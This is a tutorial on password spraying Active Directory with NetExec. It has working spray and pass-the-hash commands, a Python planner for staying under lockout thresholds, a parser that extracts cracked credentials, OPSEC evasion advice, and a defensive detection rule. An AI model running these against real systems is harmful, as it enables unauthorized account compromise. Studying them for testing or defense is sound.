Password Spraying with NetExec
#Overview
Password spraying is the technique of testing a single password (or a small set of passwords) against many user accounts while staying under each account's lockout threshold. It is the inverse of brute-forcing (many passwords against one account, which locks that account out). NetExec (nxc) is well suited to spraying because it speaks SMB, LDAP, WinRM, MSSQL, RDP and SSH with the same credential syntax, can pair users and passwords 1:1 or as a cartesian product, and can keep going after the first hit. It does not track badPwdCount for you: the lockout arithmetic remains your job.
#Prerequisites
- List of valid domain usernames (from an LDAP dump, `--rid-brute`, `--users` against a DC, or OSINT)
- One or more candidate passwords (seasonal patterns, company name variations, leaked credentials)
- The domain password policy: lockout threshold, lockout duration and observation window (`--pass-pol`)
- NetExec installed
#The Core Spraying Command
# Single password across many users
netexec smb 10.10.10.5 -u users.txt -p 'Summer2024!' --continue-on-success
# 10.10.10.5 -> ONE host (the DC). Every target host tries every user, and each failure
#    for a domain account is forwarded to the DC and counted, so a /24 with 50 hosts
#    costs 50 failures per user for a single password
# -u users.txt -> one username per line
# -p 'Summer2024!' -> the one password tested against every user
# --continue-on-success -> keep testing the remaining users after the first valid credential
#    (by default NetExec stops at the first hit on a host)
# Single user across many passwords (brute force, not a spray: every failure counts against this one account)
netexec smb 10.10.10.5 -u administrator -p passwords.txt
# Without --no-bruteforce every user/password combination is tried (cartesian product)
# User:password pairs (exact 1:1 pairing, e.g. breach data)
netexec smb 10.10.10.5 -u users.txt -p passwords.txt --no-bruteforce
# --no-bruteforce -> line 1 of users.txt with line 1 of passwords.txt, line 2 with line 2, ...
BASH
#Spraying Strategies
#Strategy 1: Seasonal/Contextual Passwords
Most organizations have users with predictable password patterns. Each command below is one round against the lockout counter of every sprayed account, so count rounds against the threshold and spray a single host (here the DC, 10.10.10.5):
# Seasonal patterns (one round each)
netexec smb 10.10.10.5 -u users.txt -p 'Summer2024!' --continue-on-success
netexec smb 10.10.10.5 -u users.txt -p 'Fall2024!' --continue-on-success
netexec smb 10.10.10.5 -u users.txt -p 'Winter2024!' --continue-on-success
netexec smb 10.10.10.5 -u users.txt -p 'Spring2025!' --continue-on-success
# Company name variations
netexec smb 10.10.10.5 -u users.txt -p 'Acme2024!' --continue-on-success
netexec smb 10.10.10.5 -u users.txt -p 'Acme@2024' --continue-on-success
netexec smb 10.10.10.5 -u users.txt -p 'Welcome123' --continue-on-success
# Local sports teams / landmarks
netexec smb 10.10.10.5 -u users.txt -p 'Eagles2024!' --continue-on-success
netexec smb 10.10.10.5 -u users.txt -p 'LibertyBell1' --continue-on-success
BASH
#Strategy 2: Password Reuse from Breaches
# Test known leaked user:password pairs against the current domain (one host: the DC)
netexec smb 10.10.10.5 -u users.txt -p leaked_passwords.txt --no-bruteforce
# --no-bruteforce -> line N of users.txt is tried only with line N of leaked_passwords.txt;
#    without it every user would be tried against every leaked password and lock out quickly
BASH
#Strategy 3: Low-and-Slow with Jitter
# Add jitter and run single-threaded so attempts are sequential and spaced out
netexec smb 10.10.10.5 -u users.txt -p 'Summer2024!' --continue-on-success -t 1 -j 5
# -j 5 -> random 0-5 second delay before each authentication (--jitter)
# -t 1 -> one thread; with the default thread count many attempts run in parallel and the jitter barely throttles anything
# Spreading attempts over time helps against short-window rate thresholds, not against
# correlation over hours, and it does nothing for the lockout counter, which only cares
# about the number of failures inside the observation window
BASH
#Strategy 4: Protocol Rotation
Rotating protocols changes the artifacts on the target host, not the arithmetic: an attempt with a domain account is validated by a DC whatever the protocol, and every failure lands in the same badPwdCount. Use rotation to reach a different log source or to validate a found credential, not to stretch the lockout budget:
# Spray via LDAP: the DC is the only possible target, so every failure is logged on the DC itself
netexec ldap 10.10.10.5 -u users.txt -p 'Summer2024!' --continue-on-success
# Spray via WinRM against a single member server: failures also appear in that host's logs,
# but the DC still validates (and counts) every one of them
netexec winrm 10.10.10.7 -u users.txt -p 'Summer2024!' --continue-on-success
# Spray via MSSQL: Windows auth by default, so still DC-validated and counted.
# --local-auth switches to SQL Server logins, which have their own (usually absent) lockout
# policy and are logged as error 18456 in the SQL error log rather than as 4625 on the DC
netexec mssql 10.10.10.9 -u users.txt -p 'Summer2024!' --continue-on-success
BASH
#Lockout Avoidance
#Step 1: Check Password Policy First
# Domain policy over SMB (SAMR); a null session (-u '' -p '') sometimes works, otherwise any valid domain user
netexec smb 10.10.10.5 -u valid_user -p valid_pass --pass-pol
# Lockout threshold: 5 -> the 5th failed logon inside the window locks the account (0 = lockout disabled)
# Lockout duration: 30 min -> how long the lock lasts (0 = until an administrator unlocks it)
# Lockout observation window: 30 min -> badPwdCount is reset only when a failure arrives more than 30 min after the previous failure
BASH
#Step 2: Calculate Safe Spraying Rate
Safe attempts per user per batch = Lockout threshold - 2
                                  = 5 - 2 = 3 passwords, which may run back-to-back
The margin of 2 covers the real user's own typos and any other tooling hitting the same accounts.
The counter is reset only when a failure arrives more than one observation window after the previous failure:
→ After the 3rd password, wait the full 30 minutes (measured from the last attempt, plus a margin) before the next batch of 3
→ Do NOT "test 1 password every 10 minutes": each attempt then lands inside the window of the one before it, the counter never resets, and the 5th attempt (at 40 minutes) locks the account
→ A threshold of 0 means lockout is disabled; then the only limit is how much noise you accept
TEXT
#Step 3: Spray One Password at a Time
# Round 1: one password against all users, one host (the DC)
netexec smb 10.10.10.5 -u users.txt -p 'Summer2024!' --continue-on-success
# Rounds 2 and 3 may follow immediately (3 failures per account so far with a threshold of 5).
# After the 3rd round, wait the full observation window, counted from the LAST attempt, before the next batch
netexec smb 10.10.10.5 -u users.txt -p 'Fall2024!' --continue-on-success
BASH
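The arithmetic in Steps 1 to 3 is easy to get wrong once rounds stretch over hours, so here is a small planner, added for this page and not part of NetExec, that applies the badPwdCount reset rule (the counter is reset only when a failure arrives more than one observation window after the previous failure) to a list of candidate passwords. It assumes you already have the threshold and window from `--pass-pol`; the policy numbers, the passwords and the two-minute round duration are constructed for the example, and all times are minutes from the start of the operation.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class LockoutPolicy:
    """Values read with --pass-pol (example numbers, not a real domain)."""
    threshold: int      # lockoutThreshold: failures that lock the account; 0 = lockout disabled
    window: float       # lockOutObservationWindow ("reset counter after"), in minutes
    margin: int = 2     # attempts deliberately left unused for the real user's own typos


@dataclass
class BadPwdState:
    """What the DC (PDC emulator) tracks per account."""
    count: int = 0                          # badPwdCount
    last_failure: Optional[float] = None    # badPasswordTime
    locked: bool = False


def effective_count(state, policy, now):
    """badPwdCount as the DC evaluates it at `now`.

    The counter is reset only when the newest failure is more than one window after
    the previous failure. Evenly spaced attempts that each fall inside the window
    never reset it: that is the "one password every 10 minutes" trap.
    """
    if state.last_failure is None or now - state.last_failure > policy.window:
        return 0
    return state.count


def record_failure(state, policy, now):
    """Apply one failed logon at `now`; return True if the account is now locked."""
    state.count = effective_count(state, policy, now) + 1
    state.last_failure = now
    if policy.threshold and state.count >= policy.threshold:
        state.locked = True
    return state.locked


def simulate(attempt_minutes, policy):
    """Replay failed attempts against one account; return (locked, final badPwdCount)."""
    state = BadPwdState()
    for t in attempt_minutes:
        if record_failure(state, policy, t):
            return True, state.count
    return False, state.count


def plan_rounds(passwords, policy, start=0.0, round_duration=2.0, buffer=1.0):
    """Assign a start minute to each round (one password across the whole user list).

    Rounds run back-to-back in batches of (threshold - margin). A new batch starts one
    full window plus `buffer` after the END of the previous round, i.e. after the last
    attempt any account in the list could have received.
    """
    per_batch = len(passwords) if policy.threshold == 0 else max(1, policy.threshold - policy.margin)
    plan = []
    t = start
    for i, password in enumerate(passwords):
        if i and i % per_batch == 0:
            t += policy.window + buffer     # here t is the end of the previous round
        plan.append((t, password))
        t += round_duration
    return plan


if __name__ == "__main__":
    policy = LockoutPolicy(threshold=5, window=30)
    # The tempting schedule: one password every 10 minutes. Never resets, locks on the 5th.
    print("every 10 min:", simulate([0, 10, 20, 30, 40], policy))
    plan = plan_rounds(["Summer2024!", "Fall2024!", "Winter2024!",
                        "Spring2025!", "Acme2024!", "Welcome123"], policy)
    for t, pw in plan:
        print(f"t+{t:5.1f} min  netexec smb 10.10.10.5 -u users.txt -p '{pw}' --continue-on-success")
    # Worst case for one account: it is hit at the start of every round.
    print("planned schedule:", simulate([t for t, _ in plan], policy))
```

The planner spaces batches from the end of a round rather than its start, because an account near the bottom of users.txt is hit last; with a long user list measure `round_duration` from a real run and feed it in.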
#Advanced Spraying Techniques
#Targeted Spraying (High-Value Users Only)
# Extract high-value users first (-i: account names are not case-consistent in AD dumps)
grep -iE "admin|sql|svc|backup|service" users.txt > high_value_users.txt
# Spray only high-value targets, against the DC. These accounts are also the most likely to be
# covered by a stricter fine-grained policy or to be watched, so check the policy for them specifically
netexec smb 10.10.10.5 -u high_value_users.txt -p 'P@ssw0rd!' --continue-on-success
BASH
#Subnet-Wide Spraying
# A range is NOT for guessing domain passwords: every host fails separately for every user and each
# failure is counted by the DC, so one password across a /24 can lock the whole user list at once.
# A range makes sense for local accounts (each host has its own SAM and its own lockout counter) ...
netexec smb 10.10.10.0/24 -u administrator -p 'Summer2024!' --local-auth --continue-on-success
# ... or for mapping where an already valid domain credential has access (successful logons do not increment badPwdCount)
netexec smb 10.10.10.0/24 10.10.11.0/24 10.10.12.0/24 -u jsmith -p 'Summer2024!'
BASH
#Spraying with Hashes (Pass-the-Hash Spray)
# If you have one local admin hash, test it against every host in the range
netexec smb 10.10.10.0/24 -u administrator -H ':NTHASH' --local-auth
# -H accepts LMHASH:NTHASH or just the NT hash; --local-auth authenticates against each host's own SAM,
# so nothing reaches the DC and lockout counters (if the local policy has any) are per host
# A wrong hash is still a failed logon (4625) on that host; (Pwn3d!) marks hosts where the same
# local admin hash works, typically because they share an image or a reused local admin password
BASH
#Output and Logging
# NetExec keeps its own logs under ~/.nxc/logs/ and stores every valid credential in its database;
# --log writes a copy of the console output to a file of your choice
netexec smb 10.10.10.5 -u users.txt -p 'Summer2024!' --continue-on-success --log spray_results.log
# Valid credentials from the log (-F: treat [+] as a literal string, not a bracket expression)
grep -F '[+]' spray_results.log
# Line format: PROTO IP PORT HOST [+] DOMAIN\user:password [(Pwn3d!)] -> the credential is field 6,
# not fields 2 and 4 (those are the IP and hostname). Breaks for passwords containing spaces
grep -F '[+]' spray_results.log | awk '{print $6}' | sort -u > valid_creds.txt
# The database survives across runs: nxcdb, then `creds` (workspace default, protocol smb)
BASH
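Parsing the console output by field number breaks as soon as a password contains a space, and the `[-]` lines carry information a sprayer needs just as much: a `STATUS_ACCOUNT_LOCKED_OUT` means stop and redo the policy maths. The following parser is an added example, not part of NetExec. It reads the `PROTO IP PORT HOST [+/-] DOMAIN\user:secret ...` line format shown above, pulls out the valid credentials, the `(Pwn3d!)` hosts and the locked-out accounts, and builds the trimmed user list for the next round. The sample output it runs on is constructed for the example, not a real capture.

```python
import re

# Constructed sample of NetExec console output (not a real engagement capture).
SAMPLE_OUTPUT = """\
SMB         10.10.10.5      445    DC01             [+] corp.local\\jsmith:Summer2024!
SMB         10.10.10.5      445    DC01             [+] corp.local\\kdoe:Fall:2024 again
SMB         10.10.10.5      445    DC01             [-] corp.local\\amiller:Summer2024! STATUS_LOGON_FAILURE
SMB         10.10.10.5      445    DC01             [-] corp.local\\tjones:Summer2024! STATUS_ACCOUNT_LOCKED_OUT
SMB         10.10.10.7      445    FS01             [+] corp.local\\backup_svc:Summer2024! (Pwn3d!)
WINRM       10.10.10.7      5985   FS01             [+] corp.local\\backup_svc:Summer2024! (Pwn3d!)
"""

# PROTO  IP  PORT  HOST  [+|-]  rest-of-line (credential, then an optional marker or status)
LINE_RE = re.compile(
    r"^(?P<proto>[A-Z]+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"\[(?P<mark>[+-])\]\s+(?P<rest>.+?)\s*$"
)
PWNED = "(Pwn3d!)"


def parse_line(line):
    """Return a dict for one result line, or None for banners and other output."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rest, pwned, status = m["rest"], False, None
    if rest.endswith(PWNED):
        pwned, rest = True, rest[: -len(PWNED)].rstrip()
    else:
        head, _, tail = rest.rpartition(" ")
        if tail.startswith("STATUS_"):      # failure reason printed after the credential
            rest, status = head, tail
    domain, _, userpass = rest.partition("\\")
    user, _, secret = userpass.partition(":")   # split on the FIRST colon: passwords may contain more
    return {"proto": m["proto"], "ip": m["ip"], "host": m["host"], "ok": m["mark"] == "+",
            "domain": domain, "user": user, "secret": secret, "pwned": pwned, "status": status}


def parse_output(text):
    return [r for r in (parse_line(line) for line in text.splitlines()) if r]


def valid_creds(records):
    """Unique (domain, user, secret) triples; one credential may succeed on several hosts."""
    return sorted({(r["domain"], r["user"], r["secret"]) for r in records if r["ok"]})


def pwned_hosts(records):
    """host -> set of users with admin access there (the (Pwn3d!) marker)."""
    out = {}
    for r in records:
        if r["pwned"]:
            out.setdefault(r["host"], set()).add(r["user"])
    return out


def locked_accounts(records):
    """Accounts that returned STATUS_ACCOUNT_LOCKED_OUT: stop spraying and re-check the policy."""
    return sorted({r["user"] for r in records if r["status"] == "STATUS_ACCOUNT_LOCKED_OUT"})


def next_round_users(all_users, records):
    """User list for the next password: drop cracked accounts (no reason to add failures to
    them) and locked ones (more attempts only extend the lockout and the noise)."""
    drop = {u for _, u, _ in valid_creds(records)} | set(locked_accounts(records))
    return [u for u in all_users if u not in drop]


if __name__ == "__main__":
    recs = parse_output(SAMPLE_OUTPUT)
    for domain, user, secret in valid_creds(recs):
        print(f"{domain}\\{user}:{secret}")
    print("admin on:", pwned_hosts(recs))
    print("locked:", locked_accounts(recs))
```

Feed it the file written with `--log`; `next_round_users` gives the users.txt for the following password, which is also what keeps the lockout maths honest, since an account that already produced a hit or a lockout should receive no further attempts.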
#Common Pitfalls
- ⚠️ Lockout threshold unknown: Always check the password policy (`--pass-pol`) before spraying. Guessing the threshold leads to account lockouts, and a handful of locked users is the fastest way to get an engagement noticed.
- ⚠️ Observation window resets from the last failure: badPwdCount is reset only when a new failure arrives more than one observation window after the previous one. With a threshold of 5 and a 30-minute window, 3 passwords in 10 minutes is fine once, but a 4th and 5th inside the window lock the account, and "one password every 10 minutes" never resets the counter at all. Wait the full window after the last attempt before the next batch.
- ⚠️ Every target host counts: a domain user sprayed against a /24 fails once per host, and every failure is forwarded to the DC and added to the same badPwdCount. Spray domain accounts against a single host (normally a DC); use ranges only for local accounts (`--local-auth`) or for checking where an already valid credential has access.
- ⚠️ Service accounts: Service accounts often sit under a different lockout policy (or none). Spraying against `krbtgt` or `sql_svc` may not cause lockouts but is highly suspicious.
- ⚠️ Default domain policy: The Default Domain Policy, if never changed, is minimum length 7, complexity enabled, lockout threshold 0 (no lockout). Always verify; most organizations change these defaults.
- ⚠️ Fine-grained password policies: Windows Server 2008+ supports Password Settings Objects (PSOs) applied to specific users or groups, so the domain-wide policy may not apply to privileged accounts. `--pass-pol` on a DC reports only the domain-wide policy; PSOs live under CN=Password Settings Container,CN=System in the domain and are, by default, readable only by privileged accounts, so assume the stricter threshold for high-value users unless you can read their PSO.
#OPSEC Considerations
| Technique | Noise Level | Artifacts |
|---|---|---|
| Single password spray | Medium | One logon failure per account on the DC (4776/4625 for NTLM, 4771 with Kerberos `-k`), all from one source address within minutes: the classic many-accounts-one-source pattern |
| Low-and-slow with jitter (`-j`, `-t 1`) | Low to Medium | Same events and same total count, spread over a longer period; defeats short-window rate thresholds, not correlation over hours |
| LDAP-based spraying | Medium | Every attempt lands on the DC itself; failed binds are still logged as logon failures on the DC (4625/4776, or 4771 with Kerberos), only the logon process differs |
| Multi-protocol rotation | Medium | Host-side artifacts differ (WinRM HTTP logs, SQL Server error 18456, SMB 4625 on the member server), but the DC validates every domain logon and badPwdCount is shared across protocols |
| Hash spraying (`-H`, local accounts) | Low | Local-account auth never reaches the DC; a wrong hash still produces a 4625 on the target, a valid one produces a 4624 network logon with NTLM (and admin share access on Pwn3d! hosts) |
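To make the "pattern recognizable" column concrete, here is the detection logic a SOC would run over DC logon-failure events (4625/4771/4776): group failures by source address and alert when one source fails against many distinct accounts inside a window. This is an added example, not NetExec code or any vendor's rule. The events are constructed tuples of (minute, source IP, target account) standing in for the real event fields, and the window and account thresholds are illustrative. It shows why jitter only buys time against a short window: the same rule with a longer window catches the low-and-slow spray as well.

```python
from collections import defaultdict

# Constructed stand-ins for DC logon-failure events: (minute, source_ip, target_account).
SPRAY = [(m * 0.25, "10.10.10.50", f"user{m:02d}") for m in range(12)]   # 12 accounts in 3 minutes
TYPOS = [(5.0, "10.10.10.20", "amiller"), (5.5, "10.10.10.20", "amiller"),
         (6.0, "10.10.10.20", "amiller")]                                  # one user mistyping
SLOW = [(m * 6.0, "10.10.10.60", f"svc{m:02d}") for m in range(10)]        # one account every 6 min (-j, -t 1)
EVENTS = SPRAY + TYPOS + SLOW


def detect_spray(events, window, min_accounts):
    """Sliding-window rule: for each source, count DISTINCT target accounts that failed
    within `window` minutes of any failure from that source, and report the first
    window that reaches `min_accounts`. Returns sorted (source_ip, window_start, accounts).

    Counting distinct accounts (not raw failures) is what separates a spray from a
    single user fumbling a password, and from a brute force against one account.
    """
    by_src = defaultdict(list)
    for minute, src, account in events:
        by_src[src].append((minute, account))
    alerts = []
    for src, fails in by_src.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):
            accounts = {acct for minute, acct in fails[i:] if minute - start <= window}
            if len(accounts) >= min_accounts:
                alerts.append((src, start, len(accounts)))
                break       # one alert per source is enough
    return sorted(alerts)


if __name__ == "__main__":
    # Short window: the fast spray trips, the jittered one slips through.
    print("10-minute window:", detect_spray(EVENTS, window=10, min_accounts=8))
    # Long window: same rule, both sprays trip; the typo user never does.
    print("60-minute window:", detect_spray(EVENTS, window=60, min_accounts=8))
```

Spraying through a single egress address is what makes this rule work for the defender; the offensive counterpart to jitter is therefore spreading source addresses, which this page does not cover.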
#Post-Exploitation Value
- Valid credentials → the foundation for all further attack steps
- Credential patterns → insight into the organization's password culture; the pattern that hit tells you what to try in the next round
- Local admin identification → (Pwn3d!) marks hosts where the credential has administrative (ADMIN$) access, i.e. hosts you can execute on and dump from
- Cross-protocol validation → a user valid on SMB and WinRM is a local admin or a member of Remote Management Users on that host; `netexec winrm ... -x` then gives remote command execution
#Cross-References
- SMB Operations — Primary spraying protocol
- LDAP Operations — LDAP-based spraying
- Credential Dumping — What to do after getting valid credentials
- AD Attacks via NetExec — Full attack chains
- Password Spraying (AD) — General password spraying technique
#Tool References
- NetExec Spraying Documentation
- SprayingToolkit — Complementary spraying tools
- Domain Password Audit Tool (DPAT) — Password policy analysis